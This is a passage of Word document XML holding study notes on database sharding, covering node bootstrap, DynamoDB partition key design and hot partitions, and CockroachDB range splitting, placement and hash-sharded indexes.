    </w:p>
    <w:p w14:paraId="294E34DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Once streaming complete: new node marks vnodes as serving → takes ownership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384E61B1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32069C9E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Node bootstrap time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B320A8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Depends on data volume: hours to days for large clusters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF89CE7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  During bootstrap: production traffic unaffected (old nodes serve)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A83BE3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  After bootstrap: new node shares load (each node's load reduces by 1/N)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090E3196" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DynamoDB — Partition Key Design as a First-Class Concern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0090EADD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>DynamoDB's internal architecture (not fully public, but well-understood) uses consistent hashing with automatic partition management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528EC992" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partition key design — DynamoDB's central engineering challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD7C31A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52649250" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Hot partition problem (classic DynamoDB anti-pattern):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774DE70B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="02A584FD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Table: user_sessions, partition key = user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EB9848" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Traffic pattern: celebrity user (user_id=1) has 1M followers all checking their feed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433DC8BE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ All 1M requests/second route to the single partition for user_id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344AEF8D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ DynamoDB partition limit: ~1,000 RCU/second per partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D4B57C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ Throttling: 999,000 requests/second throttled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304337E8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ Exponential backoff storms → cascading failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC47B4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="15BAFF68" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Solution 1: Write sharding (synthetic shard key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E508BB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Append a random suffix to the partition key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8CC082" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    partition_key = user_id + "_" + random(0, 9)  -- 10 logical shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C1F525" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE675F1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Writes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37476ECD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Choose random suffix: user_id = "celebrity_3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A72768E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Write to 10 different partition keys for the same user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243AF563" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E49B9A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Reads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132251B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Must read all 10 partition keys: user_id_0 through user_id_9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC66590" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Merge results (scatter-gather within DynamoDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532F63D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D7374" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Tradeoff: 10× read cost (scatter-gather), eliminates hot partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E2F531" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E540A6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Solution 2: Distribute reads via caching (DAX — DynamoDB Accelerator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEE1711" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Read-heavy hot keys: cache in DAX (in-memory cache for DynamoDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F7BD31" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Cache hit: returned in microseconds, doesn't touch DynamoDB partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4821EEB8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Cache miss: routed to DynamoDB partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CFF4AA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA0635" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  For read-heavy hot partitions: DAX eliminates the problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD0108" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  For write-heavy hot partitions: write sharding still required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1D91AF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="126AB122" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Composite partition key design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221A0E90" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Best practice: include high-cardinality component in partition key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD8067" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0723E44F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Anti-pattern: partition_key = "ORDERS" (single value, all orders on one partition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FA6BF7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C9E39" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Pattern: partition_key = user_id, sort_key = order_date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1ED317" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Each user's orders → one partition per user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C94DFCA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Efficient: GetItem(user_id, order_date), Query(user_id, order_date BETWEEN x AND y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665A1854" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29644774" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  For time-series:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0715E710" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Anti-pattern: partition_key = "SENSOR_DATA" (all data on one partition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4E13F2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Pattern: partition_key = sensor_id + "#" + floor(timestamp / 86400000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44602187" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      → One partition per sensor per day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F30033" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      → Each partition holds at most 24 hours of one sensor's data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235B7B4C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      → Traffic spread across N_sensors × N_days partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0795D320" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CockroachDB — Raft-Replicated Ranges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D1352A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CockroachDB implements sharding at the storage layer using </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ranges</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> — automatically managed shards replicated via Raft:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F14B20" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DBCD51" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Range structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736042DC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Size: 512MB per range (default, configurable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF1F918" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Split: when range exceeds 512MB → automatic range split</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EDDB45" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Replicate: each range replicated 3× via Raft (default replication factor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4701BFD5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29291916" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Range placement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B41824" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Ranges distributed across nodes for balanced load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200EEAEE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Rebalancer: background process that moves replicas to balance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77577BBB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    - Data distribution (each node has similar storage usage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7232BBE0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    - QPS distribution (each node has similar query load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E85D3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    - Replica distribution (each node has similar number of replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0840B677" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A4994C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Zone configs: constrain where ranges are placed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0699B694" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    CREATE TABLE eu_users (...) CONFIGURE ZONE USING constraints = '[+region=eu-west-1]';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FE078F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → All replicas for eu_users ranges placed in eu-west-1 nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1974D0D8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → GDPR compliance: EU user data stays in EU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317CA46B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → Low-latency reads for EU users (data co-located with EU application servers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BC6E52" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="78E10445" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Range split triggers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6DCC04" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Size exceeds 512MB → split at midpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E38A684" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  High QPS on a range → split to distribute load (load-based splitting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5919E8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  User-defined split point:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4387D1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    ALTER TABLE orders SPLIT AT VALUES ('2024-01-01');  -- pre-split for bulk import</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BE08AF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5FFE68" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Range merge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AFDE02" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Two adjacent ranges both small → merge into one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E4C0E0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Reduces overhead (fewer Raft groups, fewer consensus rounds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C83C86" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C6B0EF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>SQL → range routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E628B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Primary key determines range: each range owns a contiguous primary key span</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11973E4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Query with primary key predicate → one specific range → one Raft group → one node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723DC53E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Query without primary key → scatter across all ranges holding matching data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C4E158" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A05D6B2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Corollary: primary key design in CockroachDB = sharding strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0A2975" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Use UUID primary keys: uuid_generate_v4() → random distribution across ranges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E52939" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Use sequential IDs: monotonic → all inserts go to the last range (hot range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B40A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B40EC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    CockroachDB built-in UUID: gen_random_uuid() → automatically distributed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07166ED0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Or: use hash-sharded indexes for sequential keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A5C336" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      CREATE INDEX ON orders(order_id) USING HASH WITH BUCKET_COUNT=8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3E9116" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      → distributes sequential order_ids across 8 hash buckets (8 ranges)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7750C1BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
